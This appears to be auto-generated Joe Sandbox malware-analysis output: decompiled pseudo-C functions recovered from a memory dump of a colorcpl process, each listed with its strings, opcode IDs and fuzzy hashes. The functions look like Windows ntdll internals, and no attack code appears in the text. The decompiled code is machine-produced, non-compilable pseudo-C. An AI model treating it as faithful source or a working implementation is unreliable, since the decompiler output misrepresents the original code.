                                                                                                					L6:
                                                                                                					 *(_t83 - 4) = 1;
                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                                					 *(_t83 - 4) = _t80;
                                                                                                					if(_t68 < 0) {
                                                                                                						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                                                                						if(_t82 == 0) {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						asm("btr eax, ecx");
                                                                                                						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                                						if( *_t82 != 0) {
                                                                                                							 *0x6f07b10 =  *0x6f07b10 - 8;
                                                                                                						}
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                                					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                                                                					_t51 =  *0x6f0536c; // 0xe42918
                                                                                                					if( *_t51 != 0x6f05368) {
                                                                                                						_push(3);
                                                                                                						asm("int 0x29");
                                                                                                						goto L14;
                                                                                                					}
                                                                                                					 *_t55 = 0x6f05368;
                                                                                                					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                                                                					 *_t51 = _t55;
                                                                                                					 *0x6f0536c = _t55;
                                                                                                					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                                                                					if(_t52 != 0) {
                                                                                                						 *_t52 = _t55;
                                                                                                					}
                                                                                                					_t39 = 0;
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                                                                				_t68 = E06E4A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                                                                				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                                                                				if(_t68 < 0) {
                                                                                                					goto L14;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                                                                				goto L6;
                                                                                                			}

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >
                                                                                                • API String ID: 0-260571596
                                                                                                • Opcode ID: 66ea97d04ae221e93329353c4d3fd5529bfcbb6aad8d1a883103224c7e84bf58
                                                                                                • Instruction ID: e5adebf0ebd4c7c44e2d6573639264bc0547818656848bbaac4d9f3dbc2621ff
                                                                                                • Opcode Fuzzy Hash: 66ea97d04ae221e93329353c4d3fd5529bfcbb6aad8d1a883103224c7e84bf58
                                                                                                • Instruction Fuzzy Hash: FC419D75E44304DFDB94DF6CD880BA9B7F2BF48314F1590A9E808AB349C374A900CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E06E93884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                                				char _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr* _v16;
                                                                                                				char* _v20;
                                                                                                				short _v22;
                                                                                                				char _v24;
                                                                                                				intOrPtr _t38;
                                                                                                				short _t40;
                                                                                                				short _t41;
                                                                                                				void* _t44;
                                                                                                				intOrPtr _t47;
                                                                                                				void* _t48;
                                                                                                
                                                                                                				_v16 = __edx;
                                                                                                				_t40 = 0x14;
                                                                                                				_v24 = _t40;
                                                                                                				_t41 = 0x16;
                                                                                                				_v22 = _t41;
                                                                                                				_t38 = 0;
                                                                                                				_v12 = __ecx;
                                                                                                				_push( &_v8);
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push(2);
                                                                                                				_t43 =  &_v24;
                                                                                                				_v20 = L"BinaryName";
                                                                                                				_push( &_v24);
                                                                                                				_push(__ecx);
                                                                                                				_t47 = 0;
                                                                                                				_t48 = E06E59650();
                                                                                                				if(_t48 >= 0) {
                                                                                                					_t48 = 0xc000090b;
                                                                                                				}
                                                                                                				if(_t48 != 0xc0000023) {
                                                                                                					_t44 = 0;
                                                                                                					L13:
                                                                                                					if(_t48 < 0) {
                                                                                                						L16:
                                                                                                						if(_t47 != 0) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                                						}
                                                                                                						L18:
                                                                                                						return _t48;
                                                                                                					}
                                                                                                					 *_v16 = _t38;
                                                                                                					 *_a4 = _t47;
                                                                                                					goto L18;
                                                                                                				}
                                                                                                				_t47 = L06E34620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                				if(_t47 != 0) {
                                                                                                					_push( &_v8);
                                                                                                					_push(_v8);
                                                                                                					_push(_t47);
                                                                                                					_push(2);
                                                                                                					_push( &_v24);
                                                                                                					_push(_v12);
                                                                                                					_t48 = E06E59650();
                                                                                                					if(_t48 < 0) {
                                                                                                						_t44 = 0;
                                                                                                						goto L16;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                                						_t48 = 0xc000090b;
                                                                                                					}
                                                                                                					_t44 = 0;
                                                                                                					if(_t48 < 0) {
                                                                                                						goto L16;
                                                                                                					} else {
                                                                                                						_t17 = _t47 + 0xc; // 0xc
                                                                                                						_t38 = _t17;
                                                                                                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                                							_t48 = 0xc000090b;
                                                                                                						}
                                                                                                						goto L13;
                                                                                                					}
                                                                                                				}
                                                                                                				_t48 = _t48 + 0xfffffff4;
                                                                                                				goto L18;
                                                                                                			}
















                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryName
                                                                                                • API String ID: 0-215506332
                                                                                                • Opcode ID: 3ea0645c8e2bb409a3d08ae9a254025b9690b945c60513909035ce7b94bbea6a
                                                                                                • Instruction ID: 3f7c01ff9a1a1beeeec3df15a3702031c4c289b224b4fb288e92110a5871fa8c
                                                                                                • Opcode Fuzzy Hash: 3ea0645c8e2bb409a3d08ae9a254025b9690b945c60513909035ce7b94bbea6a
                                                                                                • Instruction Fuzzy Hash: 5331BF72D00719AFEF659A58C945EBBB778EF80B24F115169E914A7290DB309E04C7E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 33%
                                                                                                			E06E4D294(void* __ecx, char __edx, void* __eflags) {
                                                                                                				signed int _v8;
                                                                                                				char _v52;
                                                                                                				signed int _v56;
                                                                                                				signed int _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				char* _v68;
                                                                                                				intOrPtr _v72;
                                                                                                				char _v76;
                                                                                                				signed int _v84;
                                                                                                				intOrPtr _v88;
                                                                                                				char _v92;
                                                                                                				intOrPtr _v96;
                                                                                                				intOrPtr _v100;
                                                                                                				char _v104;
                                                                                                				char _v105;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t35;
                                                                                                				char _t38;
                                                                                                				signed int _t40;
                                                                                                				signed int _t44;
                                                                                                				signed int _t52;
                                                                                                				void* _t53;
                                                                                                				void* _t55;
                                                                                                				void* _t61;
                                                                                                				intOrPtr _t62;
                                                                                                				void* _t64;
                                                                                                				signed int _t65;
                                                                                                				signed int _t66;
                                                                                                
                                                                                                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                                				_v8 =  *0x6f0d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                                				_v105 = __edx;
                                                                                                				_push( &_v92);
                                                                                                				_t52 = 0;
                                                                                                				_push(0);
                                                                                                				_push(0);
                                                                                                				_push( &_v104);
                                                                                                				_push(0);
                                                                                                				_t59 = __ecx;
                                                                                                				_t55 = 2;
                                                                                                				if(E06E34120(_t55, __ecx) < 0) {
                                                                                                					_t35 = 0;
                                                                                                					L8:
                                                                                                					_pop(_t61);
                                                                                                					_pop(_t64);
                                                                                                					_pop(_t53);
                                                                                                					return E06E5B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                                				}
                                                                                                				_v96 = _v100;
                                                                                                				_t38 = _v92;
                                                                                                				if(_t38 != 0) {
                                                                                                					_v104 = _t38;
                                                                                                					_v100 = _v88;
                                                                                                					_t40 = _v84;
                                                                                                				} else {
                                                                                                					_t40 = 0;
                                                                                                				}
                                                                                                				_v72 = _t40;
                                                                                                				_v68 =  &_v104;
                                                                                                				_push( &_v52);
                                                                                                				_v76 = 0x18;
                                                                                                				_push( &_v76);
                                                                                                				_v64 = 0x40;
                                                                                                				_v60 = _t52;
                                                                                                				_v56 = _t52;
                                                                                                				_t44 = E06E598D0();
                                                                                                				_t62 = _v88;
                                                                                                				_t65 = _t44;
                                                                                                				if(_t62 != 0) {
                                                                                                					asm("lock xadd [edi], eax");
                                                                                                					if((_t44 | 0xffffffff) != 0) {
                                                                                                						goto L4;
                                                                                                					}
                                                                                                					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                                					E06E595D0();
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                                					goto L4;
                                                                                                				} else {
                                                                                                					L4:
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                                					if(_t65 >= 0) {
                                                                                                						_t52 = 1;
                                                                                                					} else {
                                                                                                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                                						}
                                                                                                					}
                                                                                                					_t35 = _t52;
                                                                                                					goto L8;
                                                                                                				}
                                                                                                			}


































                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 05b5ca21166dc47163827420e085a63ced97249e580a8544d17c35b078628b66
                                                                                                • Instruction ID: 48f32e46b284a06790f2b671bf933a90ae41b4e5071302b5f93fd677fbefa997
                                                                                                • Opcode Fuzzy Hash: 05b5ca21166dc47163827420e085a63ced97249e580a8544d17c35b078628b66
                                                                                                • Instruction Fuzzy Hash: EA3191B19083059FD791EF28DD84AAFBBE8EF85654F00292EF99483250D634DD04CBD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E06E21B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v16;
                                                                                                				intOrPtr* _t26;
                                                                                                				intOrPtr _t29;
                                                                                                				void* _t30;
                                                                                                				signed int _t31;
                                                                                                
                                                                                                				_t27 = __ecx;
                                                                                                				_t29 = __edx;
                                                                                                				_t31 = 0;
                                                                                                				_v8 = __edx;
                                                                                                				if(__edx == 0) {
                                                                                                					L18:
                                                                                                					_t30 = 0xc000000d;
                                                                                                					goto L12;
                                                                                                				} else {
                                                                                                					_t26 = _a4;
                                                                                                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                                						goto L18;
                                                                                                					} else {
                                                                                                						E06E5BB40(__ecx,  &_v16, __ecx);
                                                                                                						_push(_t26);
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(_t29);
                                                                                                						_push( &_v16);
                                                                                                						_t30 = E06E5A9B0();
                                                                                                						if(_t30 >= 0) {
                                                                                                							_t19 =  *_t26;
                                                                                                							if( *_t26 != 0) {
                                                                                                								goto L7;
                                                                                                							} else {
                                                                                                								 *_a8 =  *_a8 & 0;
                                                                                                							}
                                                                                                						} else {
                                                                                                							if(_t30 != 0xc0000023) {
                                                                                                								L9:
                                                                                                								_push(_t26);
                                                                                                								_push( *_t26);
                                                                                                								_push(_t31);
                                                                                                								_push(_v8);
                                                                                                								_push( &_v16);
                                                                                                								_t30 = E06E5A9B0();
                                                                                                								if(_t30 < 0) {
                                                                                                									L12:
                                                                                                									if(_t31 != 0) {
                                                                                                										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                                									}
                                                                                                								} else {
                                                                                                									 *_a8 = _t31;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t19 =  *_t26;
                                                                                                								if( *_t26 == 0) {
                                                                                                									_t31 = 0;
                                                                                                								} else {
                                                                                                									L7:
                                                                                                									_t31 = L06E34620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                                								}
                                                                                                								if(_t31 == 0) {
                                                                                                									_t30 = 0xc0000017;
                                                                                                								} else {
                                                                                                									goto L9;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t30;
                                                                                                			}










                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: WindowsExcludedProcs
                                                                                                • API String ID: 0-3583428290
                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                • Instruction ID: 3576c74e54bee7c911db5ae76dfde977ab3e8a03d2167e66a0f3ccef187f49ca
                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                • Instruction Fuzzy Hash: 8D21D37A900339AFDBA59A598840FDFB7AEAF80A54F165435BE148F200E631DE00C7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E3F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                				intOrPtr _t13;
                                                                                                				intOrPtr _t14;
                                                                                                				signed int _t16;
                                                                                                				signed char _t17;
                                                                                                				intOrPtr _t19;
                                                                                                				intOrPtr _t21;
                                                                                                				intOrPtr _t23;
                                                                                                				intOrPtr* _t25;
                                                                                                
                                                                                                				_t25 = _a8;
                                                                                                				_t17 = __ecx;
                                                                                                				if(_t25 == 0) {
                                                                                                					_t19 = 0xc00000f2;
                                                                                                					L8:
                                                                                                					return _t19;
                                                                                                				}
                                                                                                				if((__ecx & 0xfffffffe) != 0) {
                                                                                                					_t19 = 0xc00000ef;
                                                                                                					goto L8;
                                                                                                				}
                                                                                                				_t19 = 0;
                                                                                                				 *_t25 = 0;
                                                                                                				_t21 = 0;
                                                                                                				_t23 = "Actx ";
                                                                                                				if(__edx != 0) {
                                                                                                					if(__edx == 0xfffffffc) {
                                                                                                						L21:
                                                                                                						_t21 = 0x200;
                                                                                                						L5:
                                                                                                						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                                                						 *_t25 = _t13;
                                                                                                						L6:
                                                                                                						if(_t13 == 0) {
                                                                                                							if((_t17 & 0x00000001) != 0) {
                                                                                                								 *_t25 = _t23;
                                                                                                							}
                                                                                                						}
                                                                                                						L7:
                                                                                                						goto L8;
                                                                                                					}
                                                                                                					if(__edx == 0xfffffffd) {
                                                                                                						 *_t25 = _t23;
                                                                                                						_t13 = _t23;
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                                                					 *_t25 = _t13;
                                                                                                					L14:
                                                                                                					if(_t21 == 0) {
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					goto L5;
                                                                                                				}
                                                                                                				_t14 = _a4;
                                                                                                				if(_t14 != 0) {
                                                                                                					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                                                					if(_t16 <= 1) {
                                                                                                						_t21 = 0x1f8;
                                                                                                						_t13 = 0;
                                                                                                						goto L14;
                                                                                                					}
                                                                                                					if(_t16 == 2) {
                                                                                                						goto L21;
                                                                                                					}
                                                                                                					if(_t16 != 4) {
                                                                                                						_t19 = 0xc00000f0;
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					_t13 = 0;
                                                                                                					goto L6;
                                                                                                				} else {
                                                                                                					_t21 = 0x1f8;
                                                                                                					goto L5;
                                                                                                				}
                                                                                                			}












                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Actx
                                                                                                • API String ID: 0-89312691
                                                                                                • Opcode ID: 25ca142fa778abed9fb8e67c188c39d10ce9003d52a97e29f7d1bf789e6910da
                                                                                                • Instruction ID: 85d6caf73470e3892be883a914899cc79a7eec2f9ded70906876b170950fccf3
                                                                                                • Opcode Fuzzy Hash: 25ca142fa778abed9fb8e67c188c39d10ce9003d52a97e29f7d1bf789e6910da
                                                                                                • Instruction Fuzzy Hash: 3211D034F347228FFBA44E1DC498BB672A5EB85268F25653AE469CB3D0DA70C801C380
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E06EC8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _t35;
                                                                                                				void* _t41;
                                                                                                
                                                                                                				_t40 = __esi;
                                                                                                				_t39 = __edi;
                                                                                                				_t38 = __edx;
                                                                                                				_t35 = __ecx;
                                                                                                				_t34 = __ebx;
                                                                                                				_push(0x74);
                                                                                                				_push(0x6ef0d50);
                                                                                                				E06E6D0E8(__ebx, __edi, __esi);
                                                                                                				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                                				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                                					E06EA5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                                                					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                                						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                						asm("int3");
                                                                                                						 *(_t41 - 4) = 0xfffffffe;
                                                                                                					}
                                                                                                				}
                                                                                                				 *(_t41 - 4) = 1;
                                                                                                				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                                				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                                				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t41 - 0x64)) = L06E6DEF0;
                                                                                                				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                                				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                                				_push(_t41 - 0x70);
                                                                                                				L06E6DEF0(1, _t38);
                                                                                                				 *(_t41 - 4) = 0xfffffffe;
                                                                                                				return E06E6D130(_t34, _t39, _t40);
                                                                                                			}






                                                                                                Strings
                                                                                                • Critical error detected %lx, xrefs: 06EC8E21
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Critical error detected %lx
                                                                                                • API String ID: 0-802127002
                                                                                                • Opcode ID: eeb81fa4312385ef9b98f6b3e408ce78d3c1039722cae625297bbd3e1c79c5cd
                                                                                                • Instruction ID: 3d0495a771e00d694471200734a713deca8684a7dff84d2e479c9ebcf36672d0
                                                                                                • Opcode Fuzzy Hash: eeb81fa4312385ef9b98f6b3e408ce78d3c1039722cae625297bbd3e1c79c5cd
                                                                                                • Instruction Fuzzy Hash: 84113571E54348DFDBA4CFA98E057EDBBB4AF04365F20625EE529AB282D3744602CF14
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 06EAFF60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                • API String ID: 0-1911121157
                                                                                                • Opcode ID: e69f9999d11a1682f52681776369b880f880b8e2adcc2d57dd0dc0b08c5c5e59
                                                                                                • Instruction ID: 41074030833eff99628093af499992d33c288b28dffe4ae9d510bd072fe4af3b
                                                                                                • Opcode Fuzzy Hash: e69f9999d11a1682f52681776369b880f880b8e2adcc2d57dd0dc0b08c5c5e59
                                                                                                • Instruction Fuzzy Hash: 16110075A60344EFDFA2EB50CD48F98B7B2FF08708F249048F1086B2A1C779AA44DB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 88%
                                                                                                			E06EE5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t296;
                                                                                                				signed char _t298;
                                                                                                				signed int _t301;
                                                                                                				signed int _t306;
                                                                                                				signed int _t310;
                                                                                                				signed char _t311;
                                                                                                				intOrPtr _t312;
                                                                                                				signed int _t313;
                                                                                                				void* _t327;
                                                                                                				signed int _t328;
                                                                                                				intOrPtr _t329;
                                                                                                				intOrPtr _t333;
                                                                                                				signed char _t334;
                                                                                                				signed int _t336;
                                                                                                				void* _t339;
                                                                                                				signed int _t340;
                                                                                                				signed int _t356;
                                                                                                				signed int _t362;
                                                                                                				short _t367;
                                                                                                				short _t368;
                                                                                                				short _t373;
                                                                                                				signed int _t380;
                                                                                                				void* _t382;
                                                                                                				short _t385;
                                                                                                				signed short _t392;
                                                                                                				signed char _t393;
                                                                                                				signed int _t395;
                                                                                                				signed char _t397;
                                                                                                				signed int _t398;
                                                                                                				signed short _t402;
                                                                                                				void* _t406;
                                                                                                				signed int _t412;
                                                                                                				signed char _t414;
                                                                                                				signed short _t416;
                                                                                                				signed int _t421;
                                                                                                				signed char _t427;
                                                                                                				intOrPtr _t434;
                                                                                                				signed char _t435;
                                                                                                				signed int _t436;
                                                                                                				signed int _t442;
                                                                                                				signed int _t446;
                                                                                                				signed int _t447;
                                                                                                				signed int _t451;
                                                                                                				signed int _t453;
                                                                                                				signed int _t454;
                                                                                                				signed int _t455;
                                                                                                				intOrPtr _t456;
                                                                                                				intOrPtr* _t457;
                                                                                                				short _t458;
                                                                                                				signed short _t462;
                                                                                                				signed int _t469;
                                                                                                				intOrPtr* _t474;
                                                                                                				signed int _t475;
                                                                                                				signed int _t479;
                                                                                                				signed int _t480;
                                                                                                				signed int _t481;
                                                                                                				short _t485;
                                                                                                				signed int _t491;
                                                                                                				signed int* _t494;
                                                                                                				signed int _t498;
                                                                                                				signed int _t505;
                                                                                                				intOrPtr _t506;
                                                                                                				signed short _t508;
                                                                                                				signed int _t511;
                                                                                                				void* _t517;
                                                                                                				signed int _t519;
                                                                                                				signed int _t522;
                                                                                                				void* _t523;
                                                                                                				signed int _t524;
                                                                                                				void* _t528;
                                                                                                				signed int _t529;
                                                                                                
                                                                                                				_push(0xd4);
                                                                                                				_push(0x6ef1178);
                                                                                                				E06E6D0E8(__ebx, __edi, __esi);
                                                                                                				_t494 = __edx;
                                                                                                				 *(_t528 - 0xcc) = __edx;
                                                                                                				_t511 = __ecx;
                                                                                                				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                                				 *(_t528 - 0xbc) = __ecx;
                                                                                                				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                                				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                                				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                                				_t427 = 0;
                                                                                                				 *(_t528 - 0x74) = 0;
                                                                                                				 *(_t528 - 0x9c) = 0;
                                                                                                				 *(_t528 - 0x84) = 0;
                                                                                                				 *(_t528 - 0xac) = 0;
                                                                                                				 *(_t528 - 0x88) = 0;
                                                                                                				 *(_t528 - 0xa8) = 0;
                                                                                                				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                                				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                                					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                                					if(__eflags != 0) {
                                                                                                						_t421 = E06EE4C56(0, __edx, __ecx, __eflags);
                                                                                                						__eflags = _t421;
                                                                                                						if(_t421 != 0) {
                                                                                                							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                                							E06E5D000(0x410);
                                                                                                							 *(_t528 - 0x18) = _t529;
                                                                                                							 *(_t528 - 0x9c) = _t529;
                                                                                                							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                                							E06EE5542(_t528 - 0x9c, _t528 - 0x84);
                                                                                                						}
                                                                                                					}
                                                                                                					_t435 = _t427;
                                                                                                					 *(_t528 - 0xd0) = _t435;
                                                                                                					_t474 = _t511 + 0x65;
                                                                                                					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                					_t511 = 0x18;
                                                                                                					while(1) {
                                                                                                						 *(_t528 - 0xa0) = _t427;
                                                                                                						 *(_t528 - 0xbc) = _t427;
                                                                                                						 *(_t528 - 0x80) = _t427;
                                                                                                						 *(_t528 - 0x78) = 0x50;
                                                                                                						 *(_t528 - 0x79) = _t427;
                                                                                                						 *(_t528 - 0x7a) = _t427;
                                                                                                						 *(_t528 - 0x8c) = _t427;
                                                                                                						 *(_t528 - 0x98) = _t427;
                                                                                                						 *(_t528 - 0x90) = _t427;
                                                                                                						 *(_t528 - 0xb0) = _t427;
                                                                                                						 *(_t528 - 0xb8) = _t427;
                                                                                                						_t296 = 1 << _t435;
                                                                                                						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                                						__eflags = _t436 & _t296;
                                                                                                						if((_t436 & _t296) != 0) {
                                                                                                							goto L92;
                                                                                                						}
                                                                                                						__eflags =  *((char*)(_t474 - 1));
                                                                                                						if( *((char*)(_t474 - 1)) == 0) {
                                                                                                							goto L92;
                                                                                                						}
                                                                                                						_t301 =  *_t474;
                                                                                                						__eflags = _t494[1] - _t301;
                                                                                                						if(_t494[1] <= _t301) {
                                                                                                							L10:
                                                                                                							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                                							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                                								L12:
                                                                                                								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                                								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                                									goto L92;
                                                                                                								}
